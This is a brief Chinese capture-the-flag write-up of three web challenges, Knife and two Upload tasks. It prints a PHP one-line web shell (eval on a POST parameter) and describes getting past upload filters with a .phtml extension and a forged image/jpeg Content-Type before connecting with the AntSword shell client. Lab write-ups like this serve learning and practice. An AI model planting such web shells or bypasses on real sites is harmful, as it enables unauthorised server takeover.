[极客大挑战 2019]Knife1

1.打开附件链接

一句话木马eval($_POST["Syc"]);

2.中国蚁剑

用中国蚁剑连接

在根目录下找到一个名为flag的文件

3.得到flag

[极客大挑战 2019]Upload1

1.打开附件链接

是一个文件上传

2.一句话木马

经过多次尝试都被绕过，更改后缀为.phtml

3.bp抓包

更改Content-Type:image/jpeg

上传成功

4.访问/upload/目录

5.中国蚁剑

用蚁剑工具连接

在根目录下有一个flag的文件

6.得到flag

[ACTF2020 新生赛]Upload1

1.打开附件链接

2上传.一句话木马

3.bp抓包

修改上传文件的后缀为phtml

上传成功

4.中国蚁剑

用蚁剑工具进行连接

连接成功，在根目录下发现一个flag的文档

5.得到flag